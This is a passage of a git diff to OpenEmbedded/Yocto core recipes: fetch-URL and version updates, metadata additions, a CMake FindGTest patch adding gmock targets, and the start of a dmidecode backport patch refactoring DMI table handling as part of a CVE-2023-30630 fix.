            file://bootchartd_stop.sh \
            file://0001-collector-Allocate-space-on-heap-for-chunks.patch \
            file://0001-bootchart2-support-usrmerge.patch \
+           file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \
           "
 
 S = "${WORKDIR}/git"
-SRCREV = "331ada031f1d65f6d934d918f896e1c708c64bf7"
-PV .= "+git${SRCPV}"
+SRCREV = "868a2afab9da34f32c007d773b77253c93104636"
 
 inherit systemd update-rc.d python3native update-alternatives
 
@@ -144,7 +144,7 @@ do_install () {
 
 PACKAGES =+ "pybootchartgui"
 FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui"
-RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-shell python3-compression python3-codecs"
+RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-compression python3-codecs"
 RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}"
 RDEPENDS_${PN}_class-target += "lsb-release"
 DEPENDS_append_class-native = " python3-pycairo-native"
diff --git a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
index cdc971cf5d..be61916cc6 100644
--- a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
+++ b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev"
 RDEPENDS_${PN} = "libgcc"
 
 SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334"
-SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \
+SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \
            file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \
            "
 
@@ -49,4 +49,4 @@ do_install_append() {
     fi
 }
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-devtools/build-compare/build-compare_git.bb b/meta/recipes-devtools/build-compare/build-compare_git.bb
index b0560cc277..6afa9a0d68 100644
--- a/meta/recipes-devtools/build-compare/build-compare_git.bb
+++ b/meta/recipes-devtools/build-compare/build-compare_git.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
 
-SRC_URI = "git://github.com/openSUSE/build-compare.git \
+SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \
            file://Ignore-DWARF-sections.patch;striplevel=1 \
            "
 
diff --git a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
index c08da6cdca..cd2ca8dbe9 100644
--- a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
+++ b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
@@ -3,6 +3,7 @@
 # Released under the MIT license (see packages/COPYING)
 SUMMARY = "A set of tools for CD recording, including cdrecord"
 HOMEPAGE = "http://sourceforge.net/projects/cdrtools/"
+DESCRIPTION = "cdrecord tool is Highly portable CD/DVD/BluRay command line recording software."
 SECTION = "console/utils"
 LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312"
diff --git a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
index b2952ee5f5..96a7be6770 100644
--- a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
+++ b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
@@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \
             file://environment.d-cmake.sh \
             file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \
             file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \
+            file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \
             "
 
 
diff --git a/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
new file mode 100644
index 0000000000..267f586a71
--- /dev/null
+++ b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
@@ -0,0 +1,255 @@
+From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001
+From: Eero Aaltonen <eero.aaltonen@iki.fi>
+Date: Sun, 17 Oct 2021 17:13:07 +0300
+Subject: [PATCH] FindGTest: Add target for gmock library
+
+`googlemock` has been absorbed into the
+[googletest](https://github.com/google/googletest) project and is built
+and installed from the same source tree.
+
+As GTest may be built with or without GMock, skip GMock if it is not
+present.
+
+Do not provide result variables for GMock.  They are not provided by
+upstream GTest's CMake Package Configuration File.
+
+Also update the test case to cover linking to `GTest::gmock`.
+
+The patch was imported from the Kitware git server
+(git@gitlab.kitware.com:cmake/cmake.git) as of commit id
+50bf457a0dd857cf976b22c5be7d333493233d1e
+
+Patch was modified to support upper case variable `GTEST_FOUND`.
+
+Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632]
+Milestone: 3.23.0
+
+Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com>
+---
+ .../dev/FindGTest-target-for-gmock.rst        |   4 +
+ Modules/FindGTest.cmake                       | 133 +++++++++++++++---
+ Tests/FindGTest/Test/CMakeLists.txt           |   4 +
+ 3 files changed, 121 insertions(+), 20 deletions(-)
+ create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst
+
+diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst
+new file mode 100644
+index 0000000000..f78242c80e
+--- /dev/null
++++ b/Help/release/dev/FindGTest-target-for-gmock.rst
+@@ -0,0 +1,4 @@
++FindGTest-target-for-gmock
++--------------------------
++
++* The :module:`FindGTest` module now provides a target for GMock, if found.
+diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake
+index e015a9840f..0331049594 100644
+--- a/Modules/FindGTest.cmake
++++ b/Modules/FindGTest.cmake
+@@ -7,10 +7,23 @@ FindGTest
+ 
+ Locate the Google C++ Testing Framework.
+ 
++.. versionadded:: 3.20
++  Upstream ``GTestConfig.cmake`` is used if possible.
++
+ Imported targets
+ ^^^^^^^^^^^^^^^^
+ 
+-This module defines the following :prop_tgt:`IMPORTED` targets:
++  This module defines the following :prop_tgt:`IMPORTED` targets:
++
++``GTest::gtest``
++  The Google Test ``gtest`` library, if found; adds Thread::Thread
++  automatically
++``GTest::gtest_main``
++  The Google Test ``gtest_main`` library, if found
++
++.. deprecated:: 3.20
++  For backwards compatibility, this module defines additionally the
++  following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5):
+ 
+ ``GTest::GTest``
+   The Google Test ``gtest`` library, if found; adds Thread::Thread
+@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets:
+ ``GTest::Main``
+   The Google Test ``gtest_main`` library, if found
+ 
+-
+ Result variables
+ ^^^^^^^^^^^^^^^^
+ 
+@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config)
+     endif()
+ endfunction()
+ 
++function(__gtest_define_backwards_compatible_library_targets)
++    set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE)
++
++    # Add targets mapping the same library names as defined in
++    # older versions of CMake's FindGTest
++    if(NOT TARGET GTest::GTest)
++        add_library(GTest::GTest INTERFACE IMPORTED)
++        target_link_libraries(GTest::GTest INTERFACE GTest::gtest)
++    endif()
++    if(NOT TARGET GTest::Main)
++        add_library(GTest::Main INTERFACE IMPORTED)
++        target_link_libraries(GTest::Main INTERFACE GTest::gtest_main)
++    endif()
++endfunction()
++
+ #
+ 
++include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
++
++# first specifically look for the CMake version of GTest
++find_package(GTest QUIET NO_MODULE)
++
++# if we found the GTest cmake package then we are done, and
++# can print what we found and return.
++if(GTest_FOUND)
++    set(GTEST_FOUND ${GTest_FOUND})
++    FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE)
++
++    set(GTEST_LIBRARIES      GTest::gtest)
++    set(GTEST_MAIN_LIBRARIES GTest::gtest_main)
++
++    __gtest_define_backwards_compatible_library_targets()
++
++    return()
++endif()
++
+ if(NOT DEFINED GTEST_MSVC_SEARCH)
+     set(GTEST_MSVC_SEARCH MD)
+ endif()
+@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD")
+     __gtest_find_library(GTEST_LIBRARY_DEBUG      gtest-mdd gtestd)
+     __gtest_find_library(GTEST_MAIN_LIBRARY       gtest_main-md  gtest_main)
+     __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind)
++    __gtest_find_library(GMOCK_LIBRARY            gmock-md  gmock)
++    __gtest_find_library(GMOCK_LIBRARY_DEBUG      gmock-mdd gmockd)
++    __gtest_find_library(GMOCK_MAIN_LIBRARY       gmock_main-md  gmock_main)
++    __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind)
+ else()
+     __gtest_find_library(GTEST_LIBRARY            gtest)
+     __gtest_find_library(GTEST_LIBRARY_DEBUG      gtestd)
+     __gtest_find_library(GTEST_MAIN_LIBRARY       gtest_main)
+     __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind)
++    __gtest_find_library(GMOCK_LIBRARY            gmock)
++    __gtest_find_library(GMOCK_LIBRARY_DEBUG      gmockd)
++    __gtest_find_library(GMOCK_MAIN_LIBRARY       gmock_main)
++    __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind)
+ endif()
+ 
+-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
+ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY)
+ 
+-if(GTEST_FOUND)
++if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY)
++    set(GMock_FOUND True)
++else()
++    set(GMock_FOUND False)
++endif()
++
++if(GTest_FOUND)
+     set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR})
+     __gtest_append_debugs(GTEST_LIBRARIES      GTEST_LIBRARY)
+     __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY)
+-    set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES})
+ 
+     find_package(Threads QUIET)
+ 
+-    if(NOT TARGET GTest::GTest)
++    if(NOT TARGET GTest::gtest)
+         __gtest_determine_library_type(GTEST_LIBRARY)
+-        add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED)
++        add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED)
+         if(TARGET Threads::Threads)
+-            set_target_properties(GTest::GTest PROPERTIES
++            set_target_properties(GTest::gtest PROPERTIES
+                 INTERFACE_LINK_LIBRARIES Threads::Threads)
+         endif()
+         if(GTEST_LIBRARY_TYPE STREQUAL "SHARED")
+-            set_target_properties(GTest::GTest PROPERTIES
++            set_target_properties(GTest::gtest PROPERTIES
+                 INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1")
+         endif()
+         if(GTEST_INCLUDE_DIRS)
+-            set_target_properties(GTest::GTest PROPERTIES
++            set_target_properties(GTest::gtest PROPERTIES
+                 INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
+         endif()
+-        __gtest_import_library(GTest::GTest GTEST_LIBRARY "")
+-        __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE")
+-        __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG")
++        __gtest_import_library(GTest::gtest GTEST_LIBRARY "")
++        __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE")
++        __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG")
+     endif()
+-    if(NOT TARGET GTest::Main)
++    if(NOT TARGET GTest::gtest_main)
+         __gtest_determine_library_type(GTEST_MAIN_LIBRARY)
+-        add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
+-        set_target_properties(GTest::Main PROPERTIES
+-            INTERFACE_LINK_LIBRARIES "GTest::GTest")
+-        __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "")
+-        __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE")
+-        __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG")
++        add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
++        set_target_properties(GTest::gtest_main PROPERTIES
++            INTERFACE_LINK_LIBRARIES "GTest::gtest")
++        __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "")
++        __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE")
++        __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG")
++    endif()
++
++    __gtest_define_backwards_compatible_library_targets()
++endif()
++
++if(GMock_FOUND)
++    if(NOT TARGET GTest::gmock)
++        __gtest_determine_library_type(GMOCK_LIBRARY)
++        add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED)
++        set(_gmock_link_libraries "GTest::gtest")
++        if(TARGET Threads::Threads)
++            list(APPEND _gmock_link_libraries Threads::Threads)
++        endif()
++        set_target_properties(GTest::gmock PROPERTIES
++            INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}")
++        if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED")
++            set_target_properties(GTest::gmock PROPERTIES
++                INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1")
++        endif()
++        if(GTEST_INCLUDE_DIRS)
++            set_target_properties(GTest::gmock PROPERTIES
++                INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
++        endif()
++        __gtest_import_library(GTest::gmock GMOCK_LIBRARY "")
++        __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE")
++        __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG")
++    endif()
++    if(NOT TARGET GTest::gmock_main)
++        __gtest_determine_library_type(GMOCK_MAIN_LIBRARY)
++        add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED)
++        set_target_properties(GTest::gmock_main PROPERTIES
++            INTERFACE_LINK_LIBRARIES "GTest::gmock")
++        __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "")
++        __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE")
++        __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG")
+     endif()
+ endif()
+diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt
+index b65b9d28f6..7d3a378a65 100644
+--- a/Tests/FindGTest/Test/CMakeLists.txt
++++ b/Tests/FindGTest/Test/CMakeLists.txt
+@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx)
+ target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS})
+ target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT})
+ add_test(NAME test_gtest_var COMMAND test_gtest_var)
++
++add_executable(test_gmock_tgt main.cxx)
++target_link_libraries(test_gmock_tgt GTest::gmock_main)
++add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt)
+-- 
+2.17.1
+
diff --git a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
index 398069eef2..870009c2ba 100644
--- a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
+++ b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
@@ -2,7 +2,6 @@ set( CMAKE_SYSTEM_NAME Linux )
 set( CMAKE_C_FLAGS $ENV{CFLAGS} CACHE STRING "" FORCE )
 set( CMAKE_CXX_FLAGS $ENV{CXXFLAGS}  CACHE STRING "" FORCE )
 set( CMAKE_ASM_FLAGS ${CMAKE_C_FLAGS} CACHE STRING "" FORCE )
-set( CMAKE_LDFLAGS_FLAGS ${CMAKE_CXX_FLAGS} CACHE STRING "" FORCE )
 set( CMAKE_SYSROOT $ENV{OECORE_TARGET_SYSROOT} )
 
 set( CMAKE_FIND_ROOT_PATH $ENV{OECORE_TARGET_SYSROOT} )
@@ -13,13 +12,13 @@ set( CMAKE_FIND_ROOT_PATH_MODE_PACKAGE ONLY )
 
 set(CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX "$ENV{OE_CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX}")
 
-# Set CMAKE_SYSTEM_PROCESSOR from the sysroot name (assuming processor-distro-os).
-if ($ENV{SDKTARGETSYSROOT} MATCHES "/sysroots/([a-zA-Z0-9_-]+)-.+-.+")
-  set(CMAKE_SYSTEM_PROCESSOR ${CMAKE_MATCH_1})
-endif()
+set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )
 
 # Include the toolchain configuration subscripts
 file( GLOB toolchain_config_files "${CMAKE_TOOLCHAIN_FILE}.d/*.cmake" )
 foreach(config ${toolchain_config_files})
     include(${config})
 endforeach()
+
+unset(CMAKE_C_IMPLICIT_INCLUDE_DIRECTORIES)
+unset(CMAKE_CXX_IMPLICIT_INCLUDE_DIRECTORIES)
diff --git a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
index c6a53ffece..3c403a4077 100644
--- a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
+++ b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "git://github.com/rpm-software-management/createrepo_c \
+SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \
            file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
            "
 
diff --git a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
index 10220ebc91..ce242c3593 100644
--- a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
+++ b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
@@ -1,11 +1,13 @@
 SUMMARY = "GNU unit testing framework, written in Expect and Tcl"
 DESCRIPTION = "DejaGnu is a framework for testing other programs. Its purpose \
 is to provide a single front end for all tests."
+HOMEPAGE = "https://www.gnu.org/software/dejagnu/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 SECTION = "devel"
 
 DEPENDS += "expect-native"
+RDEPENDS_${PN} = "expect"
 
 inherit autotools
 
diff --git a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
index aecba07235..0418ae0c5f 100644
--- a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
+++ b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
@@ -1,6 +1,7 @@
-SECTION = "console/utils"
 SUMMARY = "Command line utilities for working with *.desktop files"
+DESCRIPTION = "desktop-file-utils contains a few command line utilities for working with desktop entries"
 HOMEPAGE = "http://www.freedesktop.org/wiki/Software/desktop-file-utils"
+SECTION = "console/utils"
 LICENSE = "GPLv2+"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
diff --git a/meta/recipes-devtools/devel-config/distcc-config.bb b/meta/recipes-devtools/devel-config/distcc-config.bb
index 3cd661d543..db9e8bbcc9 100644
--- a/meta/recipes-devtools/devel-config/distcc-config.bb
+++ b/meta/recipes-devtools/devel-config/distcc-config.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Sets up distcc for compilation on the target device"
+DESCRIPTION = "${SUMMARY}"
 
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-devtools/diffstat/diffstat_1.63.bb b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
index 61b2ea5dc2..863f924b22 100644
--- a/meta/recipes-devtools/diffstat/diffstat_1.63.bb
+++ b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
@@ -5,7 +5,7 @@ reviewing large, complex patch files."
 HOMEPAGE = "http://invisible-island.net/diffstat/"
 SECTION = "devel"
 LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://install-sh;endline=42;md5=b3549726c1022bee09c174c72a0ca4a5"
+LIC_FILES_CHKSUM = "file://COPYING;md5=a3d0bb117493e804b0c1a868ddf23321"
 
 SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
            file://run-ptest \
@@ -16,8 +16,6 @@ SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
 SRC_URI[md5sum] = "b9272ec8af6257103261ec3622692991"
 SRC_URI[sha256sum] = "7eddd53401b99b90bac3f7ebf23dd583d7d99c6106e67a4f1161b7a20110dc6f"
 
-S = "${WORKDIR}/diffstat-${PV}"
-
 inherit autotools gettext ptest
 
 EXTRA_AUTORECONF += "--exclude=aclocal"
diff --git a/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
index c52f136be8..2a74a068f1 100644
--- a/meta/recipes-devtools/distcc/distcc_3.3.3.bb
+++ b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
@@ -1,6 +1,7 @@
 SUMMARY = "A parallel build system"
 DESCRIPTION = "distcc is a parallel build system that distributes \
 compilation of C/C++/ObjC code across machines on a network."
+HOMEPAGE = "https://github.com/distcc/distcc"
 SECTION = "devel"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
@@ -14,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt"
 
 RRECOMMENDS_${PN}-server = "avahi-daemon"
 
-SRC_URI = "git://github.com/distcc/distcc.git \
+SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \
            file://fix-gnome.patch \
            file://separatebuilddir.patch \
            file://default \
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
new file mode 100644
index 0000000000..f1d449acbe
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
@@ -0,0 +1,236 @@
+From 24def311c6168d0dfb7c5f0f183b72b709c49265 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:21 +0100
+Subject: [PATCH] dmidecode: Split table fetching from decoding
+
+Clean up function dmi_table so that it does only one thing:
+* dmi_table() is renamed to dmi_table_get(). It now retrieves the
+  DMI table, but does not process it any longer.
+* Decoding or dumping the table is now done in smbios3_decode(),
+  smbios_decode() and legacy_decode().
+No functional change.
+
+A side effect of this change is that writing the header and body of
+dump files is now done in a single location. This is required to
+further consolidate the writing of dump files.
+
+CVE-ID: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=39b2dd7b6ab7]
+
+Backport Changes:
+- In the file dmidecode.c, the commit [dd593d2] in v3.3 introduces
+  pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 39b2dd7b6ab719b920e96ed832cfb4bdd664e808)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+---
+ dmidecode.c | 86 ++++++++++++++++++++++++++++++++++++++---------------
+ 1 file changed, 62 insertions(+), 24 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index a3e9d6c..d6eedd1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5211,8 +5211,9 @@ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+ 	}
+ }
+ 
+-static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+-		      u32 flags)
++/* Allocates a buffer for the table, must be freed by the caller */
++static u8 *dmi_table_get(off_t base, u32 *len, u16 num, u32 ver,
++			 const char *devmem, u32 flags)
+ {
+ 	u8 *buf;
+ 
+@@ -5231,7 +5232,7 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ 		{
+ 			if (num)
+ 				printf("%u structures occupying %u bytes.\n",
+-				       num, len);
++				       num, *len);
+ 			if (!(opt.flags & FLAG_FROM_DUMP))
+ 				printf("Table at 0x%08llX.\n",
+ 				       (unsigned long long)base);
+@@ -5249,19 +5250,19 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ 		 * would be the result of the kernel truncating the table on
+ 		 * parse error.
+ 		 */
+-		size_t size = len;
++		size_t size = *len;
+ 		buf = read_file(flags & FLAG_NO_FILE_OFFSET ? 0 : base,
+ 			&size, devmem);
+-		if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)len)
++		if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)*len)
+ 		{
+ 			fprintf(stderr, "Wrong DMI structures length: %u bytes "
+ 				"announced, only %lu bytes available.\n",
+-				len, (unsigned long)size);
++				*len, (unsigned long)size);
+ 		}
+-		len = size;
++		*len = size;
+ 	}
+ 	else
+-		buf = mem_chunk(base, len, devmem);
++		buf = mem_chunk(base, *len, devmem);
+ 
+ 	if (buf == NULL)
+ 	{
+@@ -5271,15 +5272,9 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ 			fprintf(stderr,
+ 				"Try compiling dmidecode with -DUSE_MMAP.\n");
+ #endif
+-		return;
+ 	}
+ 
+-	if (opt.flags & FLAG_DUMP_BIN)
+-		dmi_table_dump(buf, len);
+-	else
+-		dmi_table_decode(buf, len, num, ver >> 8, flags);
+-
+-	free(buf);
++	return buf;
+ }
+ 
+ 
+@@ -5314,8 +5309,9 @@ static void overwrite_smbios3_address(u8 *buf)
+ 
+ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+-	u32 ver;
++	u32 ver, len;
+ 	u64 offset;
++	u8 *table;
+ 
+ 	/* Don't let checksum run beyond the buffer */
+ 	if (buf[0x06] > 0x20)
+@@ -5341,8 +5337,12 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ 		return 0;
+ 	}
+ 
+-	dmi_table(((off_t)offset.h << 32) | offset.l,
+-		  DWORD(buf + 0x0C), 0, ver, devmem, flags | FLAG_STOP_AT_EOT);
++	/* Maximum length, may get trimmed */
++	len = DWORD(buf + 0x0C);
++	table = dmi_table_get(((off_t)offset.h << 32) | offset.l, &len, 0, ver,
++			      devmem, flags | FLAG_STOP_AT_EOT);
++	if (table == NULL)
++		return 1;
+ 
+ 	if (opt.flags & FLAG_DUMP_BIN)
+ 	{
+@@ -5351,18 +5351,28 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ 		memcpy(crafted, buf, 32);
+ 		overwrite_smbios3_address(crafted);
+ 
++		dmi_table_dump(table, len);
+ 		if (!(opt.flags & FLAG_QUIET))
+ 			printf("# Writing %d bytes to %s.\n", crafted[0x06],
+ 			       opt.dumpfile);
+ 		write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
+ 	}
++	else
++	{
++		dmi_table_decode(table, len, 0, ver >> 8,
++				 flags | FLAG_STOP_AT_EOT);
++	}
++
++	free(table);
+ 
+ 	return 1;
+ }
+ 
+ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+-	u16 ver;
++	u16 ver, num;
++	u32 len;
++	u8 *table;
+ 
+ 	/* Don't let checksum run beyond the buffer */
+ 	if (buf[0x05] > 0x20)
+@@ -5402,8 +5412,13 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ 		printf("SMBIOS %u.%u present.\n",
+ 			ver >> 8, ver & 0xFF);
+ 
+-	dmi_table(DWORD(buf + 0x18), WORD(buf + 0x16), WORD(buf + 0x1C),
+-		ver << 8, devmem, flags);
++	/* Maximum length, may get trimmed */
++	len = WORD(buf + 0x16);
++	num = WORD(buf + 0x1C);
++	table = dmi_table_get(DWORD(buf + 0x18), &len, num, ver << 8,
++			      devmem, flags);
++	if (table == NULL)
++		return 1;
+ 
